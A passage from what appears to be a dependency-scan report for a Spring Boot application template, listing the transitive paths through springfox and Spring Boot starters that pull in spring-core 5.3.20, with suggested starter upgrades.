  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
